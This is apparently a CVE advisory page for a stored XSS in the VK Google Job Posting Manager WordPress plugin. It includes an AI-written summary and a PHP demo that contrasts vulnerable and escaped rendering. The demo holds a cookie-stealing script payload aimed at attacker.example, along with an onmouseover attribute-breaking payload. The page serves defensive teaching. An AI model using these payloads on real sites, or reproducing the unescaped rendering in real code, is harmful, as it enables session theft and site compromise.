VYPR
Medium severity · 6.5 · NVD Advisory · Published Dec 16, 2025 · Updated Apr 15, 2026

CVE-2025-68070

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Vektor,Inc. VK Google Job Posting Manager vk-google-job-posting-manager allows Stored XSS. This issue affects VK Google Job Posting Manager: from n/a through <= 1.2.22.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stored XSS in VK Google Job Posting Manager plugin (≤1.2.22) allows attackers to inject malicious scripts through unsanitized input.

Vulnerability Overview

The VK Google Job Posting Manager plugin for WordPress (versions ≤ 1.2.22) contains a stored cross-site scripting (XSS) vulnerability caused by improper neutralization of user-supplied input during web page generation [1]. Input submitted through one or more plugin fields (the description does not name which) is written to the database without sanitization and later rendered into a page without output escaping, so a script payload persists and executes in the browser of every user who views the affected page.

Attack Vector and Exploitation

Exploitation requires authenticated access to the plugin's input fields; the description does not state the minimum role, and the 6.5 score is consistent with a low-privileged account (Contributor or higher is typical for WordPress advisories of this class, but that is an inference, not a stated fact). The attacker submits a crafted payload, such as a script tag or an attribute-breaking string, into the affected field; it is stored and then executes whenever an administrator or visitor renders the page that displays the value [1]. The only user interaction needed is viewing that page: because the payload is stored server-side, the victim does not have to click an attacker-supplied link, which distinguishes this from reflected XSS.
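The following is an added example and not code from the VK Google Job Posting Manager plugin or from Vektor,Inc.: it shows the stored-XSS pattern the overview and attack sections describe (raw field value saved, then echoed unescaped on a later page view) beside a hardened save-and-render pair. The request field `job_company_name`, the meta key `_job_company`, the function names and the two payloads are all hypothetical; stand-ins for the WordPress helpers are defined only when the file runs outside WordPress so it executes on the CLI.

```php
<?php
// Added example, not the plugin's code. Field name, meta key, function names and
// payloads are hypothetical. Run outside WordPress with: php stored_xss_demo.php

if (!function_exists('sanitize_text_field')) {
    // Approximates WordPress sanitize_text_field(): strip tags and control bytes, trim.
    function sanitize_text_field(string $s): string {
        return trim(preg_replace('/[\x00-\x1F\x7F]/', '', strip_tags($s)));
    }
}
if (!function_exists('esc_html')) {
    // Approximates esc_html()/esc_attr(): entity-encode & < > " ' for HTML output.
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
    function esc_attr(string $s): string { return esc_html($s); }
}

// Minimal stand-in for post meta: written by one request, read back on every
// later page view. That persistence is what makes the XSS "stored".
$post_meta = [];

// Vulnerable flow: the raw request value is stored and later echoed as-is,
// both inside an attribute and as a text node.
function vulnerable_save(array &$meta, int $post_id, array $request): void {
    $meta[$post_id]['_job_company'] = $request['job_company_name'] ?? '';
}
function vulnerable_render(array $meta, int $post_id): string {
    $company = $meta[$post_id]['_job_company'] ?? '';
    return '<a class="company" title="' . $company . '">' . $company . '</a>';
}

// Hardened flow: sanitize on save, then escape at output for each context.
// Output escaping is what closes the hole: sanitize_text_field() alone leaves
// the attribute-breaking second payload intact because it contains no tags.
function hardened_save(array &$meta, int $post_id, array $request): void {
    $meta[$post_id]['_job_company'] = sanitize_text_field($request['job_company_name'] ?? '');
}
function hardened_render(array $meta, int $post_id): string {
    $company = $meta[$post_id]['_job_company'] ?? '';
    return '<a class="company" title="' . esc_attr($company) . '">' . esc_html($company) . '</a>';
}

// Constructed payloads: one targets the text node, one breaks out of the attribute.
$payloads = [
    '<script>location="https://attacker.example/?c="+document.cookie</script>',
    'Acme" onmouseover="alert(document.domain)',
];
foreach ($payloads as $i => $payload) {
    $request = ['job_company_name' => $payload];   // stands in for $_POST
    vulnerable_save($post_meta, 1, $request);
    hardened_save($post_meta, 2, $request);
    echo "payload $i\n";
    echo "  vulnerable: " . vulnerable_render($post_meta, 1) . "\n";
    echo "  hardened:   " . hardened_render($post_meta, 2) . "\n";
}
```

The vulnerable rendering emits a live `<script>` element for the first payload and an `onmouseover` handler for the second; the hardened rendering entity-encodes both, and the second case is the one worth studying because input sanitization on its own does not stop it. In a real plugin the `$_POST` value should also pass through `wp_unslash()` before sanitization, and the save path should be gated by a capability check and a nonce.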

Impact

Successful exploitation lets the attacker run arbitrary script in the context of the victim's browser session on the site: redirecting users to malicious sites, displaying fraudulent advertisements, stealing session cookies, or defacing the website [1]. If the viewer is an administrator, the script can issue authenticated requests on that administrator's behalf (for example to create users or install plugins), which is the usual path from a stored XSS to full compromise of the WordPress installation, alongside the reputational damage and data theft already possible against ordinary visitors.

Mitigation and Advisory

The affected range ends at 1.2.22, so the fix is expected in the next release; the narrative names version 1.2.23 as resolving the issue by properly sanitizing input, but this page's own patch index records no fix yet, so confirm the fixed version against the vendor changelog or the Patchstack advisory before treating a site as remediated [1]. Users should update as soon as the fixed release is confirmed. For sites that cannot update immediately, reduce exposure by limiting which roles can submit job-posting content, keeping untrusted accounts out of those roles, and applying web application firewall rules that block script and event-handler payloads in the plugin's form submissions; none of these substitutes for the patch, because they do not add the missing output escaping. This vulnerability is listed in Patchstack's database and is rated medium severity (CVSS 6.5) [1].

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 1

News mentions: 0 (no linked articles in our index yet)